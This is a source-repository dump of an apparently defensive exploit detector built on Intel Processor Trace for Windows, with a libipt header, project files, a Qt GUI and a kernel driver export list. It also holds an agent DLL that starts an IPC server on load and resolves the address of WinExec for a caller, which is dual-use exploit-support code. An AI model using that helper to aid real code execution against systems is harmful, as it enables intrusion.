Redistribution and use in source and binary forms, with or without 5 | * modification, are permitted provided that the following conditions are met: 6 | * 7 | * * Redistributions of source code must retain the above copyright notice, 8 | * this list of conditions and the following disclaimer. 9 | * * Redistributions in binary form must reproduce the above copyright notice, 10 | * this list of conditions and the following disclaimer in the documentation 11 | * and/or other materials provided with the distribution. 12 | * * Neither the name of Intel Corporation nor the names of its contributors 13 | * may be used to endorse or promote products derived from this software 14 | * without specific prior written permission. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 17 | * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 18 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 19 | * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE 20 | * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 21 | * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 22 | * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 23 | * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 24 | * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 25 | * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | * POSSIBILITY OF SUCH DAMAGE. 27 | */ 28 | 29 | #ifndef PT_LAST_IP_H 30 | #define PT_LAST_IP_H 31 | 32 | #include 33 | 34 | struct pt_packet_ip; 35 | struct pt_config; 36 | 37 | 38 | /* Keeping track of the last-ip in Intel PT packets. */ 39 | struct pt_last_ip { 40 | /* The last IP. */ 41 | uint64_t ip; 42 | 43 | /* Flags governing the handling of IP updates and queries: 44 | * 45 | * - we have seen an IP update. 46 | */ 47 | uint32_t have_ip:1; 48 | /* - the IP has been suppressed in the last update. */ 49 | uint32_t suppressed:1; 50 | }; 51 | 52 | 53 | /* Initialize (or reset) the last-ip. */ 54 | extern void pt_last_ip_init(struct pt_last_ip *last_ip); 55 | 56 | /* Query the last-ip. 57 | * 58 | * If @ip is not NULL, provides the last-ip in @ip on success. 59 | * 60 | * Returns zero on success. 61 | * Returns -pte_invalid if @last_ip is NULL. 62 | * Returns -pte_noip if there is no last-ip. 63 | * Returns -pte_ip_suppressed if the last-ip has been suppressed. 64 | */ 65 | extern int pt_last_ip_query(uint64_t *ip, const struct pt_last_ip *last_ip); 66 | 67 | /* Update last-ip. 68 | * 69 | * Updates @last_ip based on @packet and, if non-null, @config. 70 | * 71 | * Returns zero on success. 72 | * Returns -pte_invalid if @last_ip or @packet is NULL. 73 | * Returns -pte_bad_packet if @packet appears to be corrupted. 74 | */ 75 | extern int pt_last_ip_update_ip(struct pt_last_ip *last_ip, 76 | const struct pt_packet_ip *packet, 77 | const struct pt_config *config); 78 | 79 | #endif /* PT_LAST_IP_H */ 80 | -------------------------------------------------------------------------------- /Projects/PtExploitDetector/pt_dump.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/PtExploitDetector/pt_dump.h -------------------------------------------------------------------------------- /Projects/PtExploitDetector/res/icon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/PtExploitDetector/res/icon.ico -------------------------------------------------------------------------------- /Projects/PtExploitDetector/res/icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/PtExploitDetector/res/icon.png -------------------------------------------------------------------------------- /Projects/PtExploitDetector/res/libipt.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/PtExploitDetector/res/libipt.dll -------------------------------------------------------------------------------- /Projects/PtExploitDetector/resource.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/PtExploitDetector/resource.h -------------------------------------------------------------------------------- /Projects/PtExploitDetector/stdafx.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/PtExploitDetector/stdafx.cpp -------------------------------------------------------------------------------- /Projects/PtExploitDetector/stdafx.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/PtExploitDetector/stdafx.h -------------------------------------------------------------------------------- /Projects/PtExploitDetector/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /Projects/PtExploitDetectorAgent/Executors/executors.h: -------------------------------------------------------------------------------- 1 | #ifndef _PT_EXPLOIT_DETECTOR_AGENT_EXECUTORS_H_ 2 | #define _PT_EXPLOIT_DETECTOR_AGENT_EXECUTORS_H_ 3 | 4 | #include "../../common/common.h" 5 | 6 | namespace PtExploitDetectorExecutors 7 | { 8 | int GetRemoteFunctionAddress(unsigned char* data); 9 | } 10 | 11 | #endif -------------------------------------------------------------------------------- /Projects/PtExploitDetectorAgent/Executors/get_remote_function_address.cpp: -------------------------------------------------------------------------------- 1 | #include "executors.h" 2 | 3 | #pragma warning(disable : 4996) 4 | #pragma runtime_checks( "", off ) 5 | 6 | int PtExploitDetectorExecutors::GetRemoteFunctionAddress(unsigned char* remoteFunctionName) 7 | { 8 | PtExploitDetectorCommon::Xtrace(L"[PtExploitDetectorAgent] Entering to GetRemoteFunctionAddress!"); 9 | 10 | if (remoteFunctionName == nullptr) 11 | return 0; 12 | 13 | int ret = 0; 14 | DWORD* functionAddress = nullptr; 15 | 16 | std::string functionName((char*)remoteFunctionName); 17 | 18 | if (functionName == "WinExec") { 19 | functionAddress = (DWORD*)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), functionName.c_str()); 20 | } 21 | 22 | if (functionAddress != NULL) 23 | memcpy(remoteFunctionName, &functionAddress, 4); 24 | else 25 | PtExploitDetectorCommon::Xtrace(L"[PtExploitDetectorAgent] Error getting function address"); 26 | 27 | PtExploitDetectorCommon::Xtrace(L"[PtExploitDetectorAgent] Leaving GetRemoteFunctionAddress!"); 28 | 29 | return sizeof(DWORD); 30 | } 31 | -------------------------------------------------------------------------------- /Projects/PtExploitDetectorAgent/PtExploitDetectorAgent.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {e0906f37-29ec-4300-b021-a4b99c23d6b6} 18 | 19 | 20 | {58250856-0601-4e7a-ac20-3284474b9c88} 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | Source Files 29 | 30 | 31 | Source Files 32 | 33 | 34 | Source Files 35 | 36 | 37 | Common 38 | 39 | 40 | Executors 41 | 42 | 43 | 44 | 45 | Header Files 46 | 47 | 48 | Header Files 49 | 50 | 51 | Common 52 | 53 | 54 | Common 55 | 56 | 57 | Executors 58 | 59 | 60 | -------------------------------------------------------------------------------- /Projects/PtExploitDetectorAgent/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : PtExploitDetectorAgent Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this PtExploitDetectorAgent DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your PtExploitDetectorAgent application. 9 | 10 | 11 | PtExploitDetectorAgent.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | PtExploitDetectorAgent.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | PtExploitDetectorAgent.cpp 25 | This is the main DLL source file. 26 | 27 | When created, this DLL does not export any symbols. As a result, it 28 | will not produce a .lib file when it is built. If you wish this project 29 | to be a project dependency of some other project, you will either need to 30 | add code to export some symbols from the DLL so that an export library 31 | will be produced, or you can set the Ignore Input Library property to Yes 32 | on the General propert page of the Linker folder in the project's Property 33 | Pages dialog box. 34 | 35 | ///////////////////////////////////////////////////////////////////////////// 36 | Other standard files: 37 | 38 | StdAfx.h, StdAfx.cpp 39 | These files are used to build a precompiled header (PCH) file 40 | named PtExploitDetectorAgent.pch and a precompiled types file named StdAfx.obj. 41 | 42 | ///////////////////////////////////////////////////////////////////////////// 43 | Other notes: 44 | 45 | AppWizard uses "TODO:" comments to indicate parts of the source code you 46 | should add to or customize. 47 | 48 | ///////////////////////////////////////////////////////////////////////////// 49 | -------------------------------------------------------------------------------- /Projects/PtExploitDetectorAgent/dispatcher.cpp: -------------------------------------------------------------------------------- 1 | #include "helpers.h" 2 | #include "dispatcher.h" 3 | 4 | #pragma comment(lib, "Ws2_32.lib") 5 | 6 | DWORD WINAPI PtExploitDetectorAgentCore::RunPtExploitDetectorAgent(LPVOID lpParameter) 7 | { 8 | bool ret = false; 9 | HANDLE coreThread = INVALID_HANDLE_VALUE; 10 | WORD wVersionRequested = MAKEWORD(1, 0); 11 | WSADATA wsaData; 12 | WSAStartup(wVersionRequested, &wsaData); 13 | srand(GetTickCount()); 14 | 15 | DWORD currentPID = GetCurrentProcessId(); 16 | std::wstring serverName(PtExploitDetectorCommon::PRE_CHANNEL_TOKEN + std::to_wstring(currentPID)); 17 | 18 | dipc::server ptExploitDetectorAgentServer(serverName); 19 | ptExploitDetectorAgentServer.route(PtExploitDetectorCommon::ExecutorsMode::GET_REMOTE_FUNCTION_ADDRESS, PtExploitDetectorExecutors::GetRemoteFunctionAddress); 20 | 21 | ptExploitDetectorAgentServer.run(); 22 | 23 | return ret; 24 | } -------------------------------------------------------------------------------- /Projects/PtExploitDetectorAgent/dispatcher.h: -------------------------------------------------------------------------------- 1 | #ifndef _PT_EXPLOIT_DETECTOR_AGENT_DISPATCHER_H_ 2 | #define _PT_EXPLOIT_DETECTOR_AGENT_DISPATCHER_H_ 3 | 4 | #include "helpers.h" 5 | 6 | namespace PtExploitDetectorAgentCore 7 | { 8 | DWORD WINAPI ServerThread(LPVOID lp); 9 | DWORD WINAPI RunPtExploitDetectorAgent(LPVOID lpParameter); 10 | } 11 | 12 | #endif -------------------------------------------------------------------------------- /Projects/PtExploitDetectorAgent/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 2 | #include "helpers.h" 3 | 4 | BOOL APIENTRY DllMain( HMODULE hModule, 5 | DWORD ul_reason_for_call, 6 | LPVOID lpReserved 7 | ) 8 | { 9 | HANDLE threadHandle = INVALID_HANDLE_VALUE; 10 | DWORD currentPID = GetCurrentProcessId(); 11 | BOOL ret = true; 12 | switch (ul_reason_for_call) 13 | { 14 | case DLL_PROCESS_ATTACH: 15 | threadHandle = CreateThread(NULL, 0, PtExploitDetectorAgentCore::RunPtExploitDetectorAgent, NULL, 0, NULL); 16 | if (threadHandle != INVALID_HANDLE_VALUE) 17 | { 18 | PtExploitDetectorCommon::Xtrace(L"[PtExploitDetectorAgent] Agent was launched at PID: %d", currentPID); 19 | ret = true; 20 | } 21 | else 22 | { 23 | PtExploitDetectorCommon::Xtrace(L"[PtExploitDetectorAgent] There was a problem launching Agent at PID: %d", currentPID); 24 | } 25 | CloseHandle(threadHandle); 26 | break; 27 | case DLL_THREAD_ATTACH: 28 | break; 29 | case DLL_THREAD_DETACH: 30 | case DLL_PROCESS_DETACH: 31 | break; 32 | } 33 | return ret; 34 | } 35 | 36 | -------------------------------------------------------------------------------- /Projects/PtExploitDetectorAgent/helpers.cpp: -------------------------------------------------------------------------------- 1 | #include "helpers.h" 2 | -------------------------------------------------------------------------------- /Projects/PtExploitDetectorAgent/helpers.h: -------------------------------------------------------------------------------- 1 | #ifndef _PT_EXPLOIT_DETECTOR_AGENT_HELPERS_H_ 2 | #define _PT_EXPLOIT_DETECTOR_AGENT_HELPERS_H_ 3 | 4 | #include "../common/common.h" 5 | #include "../common/ipcpp.h" 6 | #include "Executors/executors.h" 7 | #include "dispatcher.h" 8 | 9 | #endif -------------------------------------------------------------------------------- /Projects/PtExploitDetectorGUI/GeneratedFiles/qrc_PtExploitDetectorGUI.cpp: -------------------------------------------------------------------------------- 1 | /**************************************************************************** 2 | ** Resource object code 3 | ** 4 | ** Created by: The Resource Compiler for Qt version 5.10.1 5 | ** 6 | ** WARNING! All changes made in this file will be lost! 7 | *****************************************************************************/ 8 | 9 | #ifdef QT_NAMESPACE 10 | # define QT_RCC_PREPEND_NAMESPACE(name) ::QT_NAMESPACE::name 11 | # define QT_RCC_MANGLE_NAMESPACE0(x) x 12 | # define QT_RCC_MANGLE_NAMESPACE1(a, b) a##_##b 13 | # define QT_RCC_MANGLE_NAMESPACE2(a, b) QT_RCC_MANGLE_NAMESPACE1(a,b) 14 | # define QT_RCC_MANGLE_NAMESPACE(name) QT_RCC_MANGLE_NAMESPACE2( \ 15 | QT_RCC_MANGLE_NAMESPACE0(name), QT_RCC_MANGLE_NAMESPACE0(QT_NAMESPACE)) 16 | #else 17 | # define QT_RCC_PREPEND_NAMESPACE(name) name 18 | # define QT_RCC_MANGLE_NAMESPACE(name) name 19 | #endif 20 | 21 | #ifdef QT_NAMESPACE 22 | namespace QT_NAMESPACE { 23 | #endif 24 | 25 | #ifdef QT_NAMESPACE 26 | } 27 | #endif 28 | 29 | int QT_RCC_MANGLE_NAMESPACE(qInitResources_PtExploitDetectorGUI)(); 30 | int QT_RCC_MANGLE_NAMESPACE(qInitResources_PtExploitDetectorGUI)() 31 | { 32 | return 1; 33 | } 34 | 35 | int QT_RCC_MANGLE_NAMESPACE(qCleanupResources_PtExploitDetectorGUI)(); 36 | int QT_RCC_MANGLE_NAMESPACE(qCleanupResources_PtExploitDetectorGUI)() 37 | { 38 | return 1; 39 | } 40 | 41 | namespace { 42 | struct initializer { 43 | initializer() { QT_RCC_MANGLE_NAMESPACE(qInitResources_PtExploitDetectorGUI)(); } 44 | ~initializer() { QT_RCC_MANGLE_NAMESPACE(qCleanupResources_PtExploitDetectorGUI)(); } 45 | } dummy; 46 | } 47 | -------------------------------------------------------------------------------- /Projects/PtExploitDetectorGUI/PtExploitDetectorGUI.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "ui_PtExploitDetectorGUI.h" 5 | #include "../PtExploitDetector/stdafx.h" 6 | #include "../PtExploitDetector/PtExploitDetector.h" 7 | #include "../PtExploitDetector/pt_dump.h" 8 | 9 | class PtExploitDetectorGUI : public QMainWindow 10 | { 11 | Q_OBJECT 12 | 13 | public: 14 | PtExploitDetectorGUI(QWidget *parent = Q_NULLPTR); 15 | 16 | private: 17 | Ui::PtExploitDetectorGUIClass ui; 18 | QString cmdlineInput; 19 | void openExeToTrace(); 20 | void startTrace(); 21 | void dumpTrace(); 22 | }; 23 | -------------------------------------------------------------------------------- /Projects/PtExploitDetectorGUI/PtExploitDetectorGUI.qrc: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /Projects/PtExploitDetectorGUI/PtExploitDetectorGUI.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {D9D6E242-F8AF-46E4-B9FD-80ECBC20BA3E} 14 | qrc;* 15 | false 16 | 17 | 18 | {99349809-55BA-4b9d-BF79-8FDBB0286EB3} 19 | ui 20 | 21 | 22 | {D9D6E242-F8AF-46E4-B9FD-80ECBC20BA3E} 23 | qrc;* 24 | false 25 | 26 | 27 | {71ED8ED8-ACB9-4CE9-BBE1-E00B30144E11} 28 | moc;h;cpp 29 | False 30 | 31 | 32 | {b2ad4c18-7608-49d7-b31c-cca54c76e4b0} 33 | 34 | 35 | {14843677-b57e-489a-97b7-b22ece9786cf} 36 | 37 | 38 | {8579eca2-8b66-4e93-9ad3-315dc40bbd91} 39 | 40 | 41 | 42 | 43 | Source Files 44 | 45 | 46 | Source Files 47 | 48 | 49 | Source Files 50 | 51 | 52 | Source Files 53 | 54 | 55 | Source Files\IPC 56 | 57 | 58 | Source Files\PT Decoder 59 | 60 | 61 | Source Files\PT Decoder 62 | 63 | 64 | Source Files\PT Decoder 65 | 66 | 67 | Source Files\PT Decoder 68 | 69 | 70 | Source Files\PT Decoder 71 | 72 | 73 | 74 | 75 | Header Files 76 | 77 | 78 | 79 | 80 | Form Files 81 | 82 | 83 | 84 | 85 | Resource Files 86 | 87 | 88 | 89 | 90 | Header Files 91 | 92 | 93 | Header Files 94 | 95 | 96 | Header Files 97 | 98 | 99 | Source Files\IPC 100 | 101 | 102 | 103 | 104 | libs 105 | 106 | 107 | -------------------------------------------------------------------------------- /Projects/PtExploitDetectorGUI/Resources/icon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/PtExploitDetectorGUI/Resources/icon.ico -------------------------------------------------------------------------------- /Projects/PtExploitDetectorGUI/main.cpp: -------------------------------------------------------------------------------- 1 | #include "PtExploitDetectorGUI.h" 2 | #include 3 | 4 | int main(int argc, char *argv[]) 5 | { 6 | QApplication a(argc, argv); 7 | PtExploitDetectorGUI w; 8 | w.show(); 9 | return a.exec(); 10 | } 11 | -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/Debug.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/WindowsPtDriver/Debug.cpp -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/Debug.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/WindowsPtDriver/Debug.h -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/DriverEntry.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/WindowsPtDriver/DriverEntry.cpp -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/DriverEntry.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/WindowsPtDriver/DriverEntry.h -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/DriverIo.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/WindowsPtDriver/DriverIo.cpp -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/DriverIo.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/WindowsPtDriver/DriverIo.h -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/Export.def: -------------------------------------------------------------------------------- 1 | ; Windows Intel Processor Trace (PT) Driver 2 | ; Filename: Exports.def 3 | ; Defines all the exported functions of the kernel driver, used for tracing Kernel code 4 | ; Last revision: 01/06/2016 5 | LIBRARY WindowsPtDriver 6 | 7 | EXPORTS 8 | IntelPtCheckCpuSupport = CheckIntelPtSupport 9 | IntelPtAllocBuffer 10 | IntelPtAddBufferPmi 11 | IntelPtRemoveBufferPmi 12 | IntelPtPauseResumeTrace = PauseResumeTrace 13 | IntelPtStopTrace 14 | IntelPtFreeBuffer = FreePtBuffer 15 | IntelPtRegisterPmiHandler 16 | IntelPtRemovePmiHandler 17 | IntelPtSetOptions 18 | IntelPtGetOptions 19 | 20 | 21 | -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/IntelPt.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/WindowsPtDriver/IntelPt.cpp -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/IntelPt.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/WindowsPtDriver/IntelPt.h -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/IntelPtXSave.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/WindowsPtDriver/IntelPtXSave.cpp -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/IntelPtXSave.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/WindowsPtDriver/IntelPtXSave.h -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/Intel_Defs.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/WindowsPtDriver/Intel_Defs.h -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/KernelTracing.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/WindowsPtDriver/KernelTracing.cpp -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/KernelTracing.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/WindowsPtDriver/KernelTracing.h -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/PtTests.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/WindowsPtDriver/PtTests.cpp -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/UndocNt.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/WindowsPtDriver/UndocNt.h -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/WindowsIntelPtDriver.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/WindowsPtDriver/WindowsIntelPtDriver.rc -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/WindowsIntelPtDriver.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Source Files 6 | 7 | 8 | Source Files 9 | 10 | 11 | Source Files 12 | 13 | 14 | Source Files 15 | 16 | 17 | Source Files 18 | 19 | 20 | Source Files 21 | 22 | 23 | Source Files 24 | 25 | 26 | 27 | 28 | Header Files 29 | 30 | 31 | Header Files 32 | 33 | 34 | Header Files 35 | 36 | 37 | Header Files 38 | 39 | 40 | Header Files 41 | 42 | 43 | Header Files 44 | 45 | 46 | Header Files 47 | 48 | 49 | Header Files 50 | 51 | 52 | Header Files 53 | 54 | 55 | Header Files 56 | 57 | 58 | 59 | 60 | {0a59f678-349f-4b75-b196-ac6e6f051185} 61 | 62 | 63 | {cc981622-83ff-4000-be86-2e79af42be21} 64 | 65 | 66 | {4b959927-b2e1-4594-8fff-e51a0d8bfc8a} 67 | 68 | 69 | {0d7a4089-f791-4f8d-b924-3adb4c817f29} 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | Resources 79 | 80 | 81 | 82 | 83 | Assembly Files 84 | 85 | 86 | -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/WindowsIntelPtDriver2015.sln: -------------------------------------------------------------------------------- 1 | Microsoft Visual Studio Solution File, Format Version 12.00 2 | # Visual Studio 14 3 | VisualStudioVersion = 14.0.25420.1 4 | MinimumVisualStudioVersion = 10.0.40219.1 5 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WindowsPtDriver", "WindowsIntelPtDriver.vcxproj", "{44253DD8-98B2-4229-8305-5DD1E272CDE3}" 6 | EndProject 7 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PtControlApp", "..\PtControlApp\PtControlApp.vcxproj", "{AEEB84F9-A268-4642-8CCC-CE05D80ACD74}" 8 | EndProject 9 | Project("{888888A0-9F3D-457C-B088-3A5042F75D52}") = "IdaPt", "..\IdaPt\IdaPt.pyproj", "{0B4592C2-FAC6-429F-80F0-C57638C2D472}" 10 | EndProject 11 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SimpleTestDriver", "..\SimpleTestDriver\SimpleTestDriver.vcxproj", "{A9D835FD-18CC-4CA8-B29B-48077C43C48B}" 12 | EndProject 13 | Global 14 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 15 | Debug|Any CPU = Debug|Any CPU 16 | Debug|Win32 = Debug|Win32 17 | Debug|x64 = Debug|x64 18 | Release|Any CPU = Release|Any CPU 19 | Release|Win32 = Release|Win32 20 | Release|x64 = Release|x64 21 | EndGlobalSection 22 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 23 | {44253DD8-98B2-4229-8305-5DD1E272CDE3}.Debug|Any CPU.ActiveCfg = Debug|Win32 24 | {44253DD8-98B2-4229-8305-5DD1E272CDE3}.Debug|Win32.ActiveCfg = Debug|Win32 25 | {44253DD8-98B2-4229-8305-5DD1E272CDE3}.Debug|Win32.Build.0 = Debug|Win32 26 | {44253DD8-98B2-4229-8305-5DD1E272CDE3}.Debug|x64.ActiveCfg = Debug|x64 27 | {44253DD8-98B2-4229-8305-5DD1E272CDE3}.Debug|x64.Build.0 = Debug|x64 28 | {44253DD8-98B2-4229-8305-5DD1E272CDE3}.Debug|x64.Deploy.0 = Debug|x64 29 | {44253DD8-98B2-4229-8305-5DD1E272CDE3}.Release|Any CPU.ActiveCfg = Release|Win32 30 | {44253DD8-98B2-4229-8305-5DD1E272CDE3}.Release|Win32.ActiveCfg = Release|Win32 31 | {44253DD8-98B2-4229-8305-5DD1E272CDE3}.Release|Win32.Build.0 = Release|Win32 32 | {44253DD8-98B2-4229-8305-5DD1E272CDE3}.Release|Win32.Deploy.0 = Release|Win32 33 | {44253DD8-98B2-4229-8305-5DD1E272CDE3}.Release|x64.ActiveCfg = Release|x64 34 | {44253DD8-98B2-4229-8305-5DD1E272CDE3}.Release|x64.Build.0 = Release|x64 35 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Debug|Any CPU.ActiveCfg = Debug|Win32 36 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Debug|Win32.ActiveCfg = Debug|Win32 37 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Debug|Win32.Build.0 = Debug|Win32 38 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Debug|x64.ActiveCfg = Debug|x64 39 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Debug|x64.Build.0 = Debug|x64 40 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Release|Any CPU.ActiveCfg = Release|Win32 41 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Release|Win32.ActiveCfg = Release|Win32 42 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Release|Win32.Build.0 = Release|Win32 43 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Release|x64.ActiveCfg = Release|x64 44 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Release|x64.Build.0 = Release|x64 45 | {0B4592C2-FAC6-429F-80F0-C57638C2D472}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 46 | {0B4592C2-FAC6-429F-80F0-C57638C2D472}.Debug|Win32.ActiveCfg = Debug|Any CPU 47 | {0B4592C2-FAC6-429F-80F0-C57638C2D472}.Debug|x64.ActiveCfg = Debug|Any CPU 48 | {0B4592C2-FAC6-429F-80F0-C57638C2D472}.Release|Any CPU.ActiveCfg = Release|Any CPU 49 | {0B4592C2-FAC6-429F-80F0-C57638C2D472}.Release|Win32.ActiveCfg = Release|Any CPU 50 | {0B4592C2-FAC6-429F-80F0-C57638C2D472}.Release|x64.ActiveCfg = Release|Any CPU 51 | {A9D835FD-18CC-4CA8-B29B-48077C43C48B}.Debug|Any CPU.ActiveCfg = Debug|Win32 52 | {A9D835FD-18CC-4CA8-B29B-48077C43C48B}.Debug|Win32.ActiveCfg = Debug|Win32 53 | 